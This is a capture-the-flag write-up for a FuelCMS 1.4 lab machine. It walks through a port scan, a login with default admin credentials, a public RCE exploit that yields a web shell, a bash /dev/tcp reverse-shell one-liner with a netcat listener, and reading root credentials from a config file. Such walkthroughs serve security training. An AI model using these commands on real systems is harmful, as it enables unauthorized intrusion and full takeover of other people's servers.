# Write-Up

### <mark style="color:purple;">Objectives</mark>

In this machine, we are tasked with finding two specific items: **user.txt** and **root.txt**.

***

### <mark style="color:purple;">Reconnaissance</mark>

We start by running an **nmap** scan on the most common 100 ports to identify open services:

```bash
nmap -F --open <ip_victim>
```

The <mark style="color:orange;">**-**</mark>**F** flag scans the top 100 common ports, and <mark style="color:orange;">**--open**</mark> shows only open ports.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXcam0MIj6qCY_4CnPIGdK3fAgSOlHwQVRwC08JfY4KTVJMGYQPXlbW-899jF0momXmLvjoRx-GtZyZGMtKd8toR65xLV7XLN6VWYFUcGKaat7QdtRyl47b_MtXLpJkn4PJoFNraHQ?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

The scan reveals that port **80** is open. We visit the web page at:

```bash
http://<ip_victim>
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXesh7LUMN9roEAVQAxDXqxcBKMMsBsj91PWQWTgte5H6-MO-jhIlFL3FfuJiefE2DEEdWRpsAb_dPfTgSrclJHxqd4_U-A5JVHgZ_8guVIUxKoONRHbrUVn_thCDskgBVkb-9MY-Q?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

We find a landing page for **FuelCMS**, version **1.4**. Reading the configuration steps, we notice a link to the **admin** panel.

Upon closer inspection of the landing page, we find default admin credentials listed: **admin/admin**. We attempt to log in to the **admin** panel using these credentials and successfully gain access.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXfkAP9cvjrrYpZ7Gl1PrNaiBmLbfmS8WOBk8BtPtTK83QLB-BS5mVfijHQaUbK0GbrnvyEhv8Ai_assE3GM0o1Ae8oJ4FpSxZGu7LhAw9MO0WRsAGNsr9rNhKIiksXRyDgl9Kc1mA?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

***

### <mark style="color:purple;">Exploitation</mark>

Once inside, the CMS seems recently installed and quite empty. Given the CMS version, we check [**exploit-db.com**](http://www.exploit-db.com) for potential vulnerabilities.

We discover three Remote Code Execution (RCE) exploits. We opt for the third one, written in **Python3**, as it is current and well-documented.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXcdybBB4xihZ6LbZrQ95BT2GIqG3ZHYqWcOPLDCb5t8HkwwGAilBMcYeXTtcsnmToKBXWXNXu5XgVWlcT99acPpkODAfEGYY93txqjD1UGEH-nSb6yGMw3ndPGDWww0SCrYY-VVrA?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

We copy the exploit to a file named **fuel.py** and run it:

```bash
python3 fuel.py -u <url_victim>
```

This provides a web shell running as **www-data**. Checking the directories, we locate **user.txt** and read its contents.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXdwhAoa7DjqmoKFKDckFKSmwUTr-ArskMvTXu2uTSNQd6CrXeFS-mFPS780WRSDPmA5DqW0wdYojl49wgKuYtTD5oXm-oVLJl-vSk3ZhzAmhQON42houBQq0_EA6mziQt9F6STvyQ?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXf2xMu7uiBcy4sGlf3BRqK_K1_S695y7EFKPTuztegsQVVTWBPPS-zumk6CQ6j_OgGwiCkYNdmssLXD-mIjvrpkGkCTxCqJuLq5LVZpo-oKdyWx1srRoK9lkUCcECxf0Asbp0XaMg?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt="" width="375"><figcaption></figcaption></figure>

***

### <mark style="color:purple;">Privilege Escalation</mark>

The web shell does not allow us to input passwords for **sudo** commands, limiting our ability to escalate privileges. To overcome this, we establish a **reverse shell**.

We start a listener on our local machine:

```bash
nc -lnvp 4444
```

Then, on the victim machine, we run:

```bash
bash -c "bash -i >& /dev/tcp/<our_ip>/4444 0>&1"
```

To find our IP, we run **`ifconfig`** and use the IP under **tun0**.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXcIft6u9ki1oQ0Ra8WGRPPyM8SDSfuweMQJmiAcSjtsWJrqLc6FIwS_d2mdip7lGT8iKsM4W-5JB6FvO840LvO87fDW-j4-OEDOe02H66u-fnr0ZfSGvvv5R37GoWTD2jwRhEiP6A?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

With the reverse shell active, we check the FuelCMS landing page again. The database configuration file mentioned in step 2 catches our attention.&#x20;

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXd3UCmzMGflxjKl3JATFvxTXZsqZgJO9IiMjpIFySpYlZWNkqV6v1pgO6iKD7ceto2Awo_Aye2fEuL2R_TV_TUkuL1rToiGv5NfJV2oE0wqWx_34jOuRUkht65mMbdu4b9mGXSvxg?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt=""><figcaption></figcaption></figure>

We inspect it:

```
cat /path/to/config/database.php
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXeO1HO1HYbaaafIv1XSMwG_j7-p1Rw7kNHQ0gSGZYR8jgGBs1Gy-nEjIc0DwTOT9VU97Y0eDjazOelEZImoWUxnbbOW-2Pv3AtamEgesDSIwgt373cRytBIcEBWYzj-jGdT7ayyXQ?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt="" width="375"><figcaption></figcaption></figure>

At the bottom, we find the **root** credentials:

```bash
username: root
password: mememe
```

However, trying to switch to root gives us a terminal error. We need a better shell, so we import a **pseudo-terminal** for full interaction:

```python
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXdmA0wSddrnSKM6OJKAAndr18SCo9qZuelqbDNTcxDKzIaA2QIfMvLSSa4Twtv4OEooGaDDpmXuzXK5zDNDt6Yq27NwIXKv9WjBKRY8JObeZYwO9R-ZmaLkeUC6_PZU8Z61Pz0-?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt="" width="375"><figcaption></figcaption></figure>

Now we try switching to root again, and it works. We locate **root.txt** and read its contents.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXd-6m4ZxDlcDq9cpOdkWQZ7UO8PleLIHjX9ISabxUO2mJWQQ1kuPAlUKnmCfsRwrCmQof2a6RSr7mf_jBZBI6oPjiRfOkC7kKrP1lvw2bVwT5YIN4LpWwvFPWJTzxxZjL6mKEfaaw?key=yJV8R1W3WJ0ftC-DkpFfQVa7" alt="" width="375"><figcaption></figcaption></figure>